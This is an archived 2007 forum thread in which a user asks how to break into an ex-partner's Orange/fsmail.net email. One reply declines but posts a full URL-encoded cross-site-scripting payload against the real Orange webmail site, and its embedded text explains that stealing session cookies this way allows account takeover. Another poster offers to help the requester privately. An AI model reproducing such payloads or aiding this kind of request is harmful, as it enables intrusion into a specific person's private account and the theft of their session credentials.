View Full Version : orange email passwords..
woods
06-09-2007, 06:49 AM
Hi,
I do not want to break any rules and so if i am asking the wrong thing then sorry... I need to access my exs email as would like to geet to the bottom of some dirty cheating . I dont expect anyone to do this for me but can someone advise me how i would hack into a fsmail.net email? many thanks ... trish
Ezekiel
06-09-2007, 11:09 AM
No we won't hack that email for you, and posting spam like this is against the rules. It's naive to expect strangers on the internet to help you with anything, let along knowingly break the law for you.
That said, it took a couple of seconds to find a cross-site-scripting vulnerability in the webmail:
Click (http://email02.orange.co.uk/webmail/en_GB/continue.html?MESSAGE=%22%3E%3Cscript%3Edocument.getElementsByTagName(%22body%22)[0].innerHTML%20=%20%22%3Cdiv%20style=\%22background-color:%20black;\%22%3E%3Ch1%20style=\%22color:%20white;\%22%3EThis%20is%20a%20cross-site-scripting%20exploit.%20%20The%20page%20hasn't%20actually%20been%20hacked,%20but%20I%20can%20craft%20 any%20document%20for%20visitors%20who%20click%20this%20link;%20still%20being%20under%20the%20correct %20domain.%20%20When%20a%20victim%20clicks%20this%20link,%20I%20could%20access%20their%20browser%20o bjects%20like%20cookies%20and%20send%20them%20off%20to%20myself%20(then%20use%20them%20to%20gain%20a ccess%20to%20the%20victim's%20account),%20or%20I%20could%20take%20any%20action%20on%20the%20victim's %20account%20including%20sending%20of%20emails.%20%20This%20would%20be%20quite%20obvious%20(as%20the y'd%20see%20the%20\%22email%20sent\%22%20page),%20but%20I%20could%20even%20grab%20their%20cookies%20 and%20send%20them%20off%20to%20myself%20using%20the%20victim's%20own%20account.%20%20I'm%20not%20goi ng%20to%20though;%20this%20is%20just%20to%20prove%20that%20it%20works.%3C/h1%3E%3C/div%3EYour%20cookie:%3Cbr%20/%3E%3Ctextarea%20rows%20%3D%20%5C%225%5C%22%20cols%20%3D%20%5C%22100%5C%22%3E%22%2Bdocument%2Ecookie %2B%22%3C/textarea%3E%22;%3C/script%3E)
woods
06-09-2007, 01:37 PM
sorry, i didnt want to break any rules... i dont know anything about this sort of stuff...so i dont really understand the cookie link you put on. but thanks anyway.
nozf3r4tu
06-10-2007, 01:44 AM
mike and moonbat are very knowledgeable guys,if you think you might be breaking the rules,use the private message feature of this forum.Even tho this is not a hacking forum,plenty of information has been posted. The moderators of the forum (mike & moon) gave you a break,but is against the rules. Send me a message ,and i'll assist you in any way i can.
aloha... mike and moon:)
m4t3m4t!x
06-12-2007, 04:08 AM
walla arkadashlar birde turkçe dil paketi koysanız ii olucaktı a.q tek basıma kaldım burda
Ezekiel
06-12-2007, 04:20 AM
walla arkadashlar birde turkçe dil paketi koysanız ii olucaktı a.q tek basıma kaldım burda
This is an English-speaking forum. Why would you post in Turkish, or whatever that language is? It's obvious nobody speaks it around here.
Powered by vBulletin™ Version 4.0.0 Copyright © 2010 vBulletin Solutions, Inc. All rights reserved.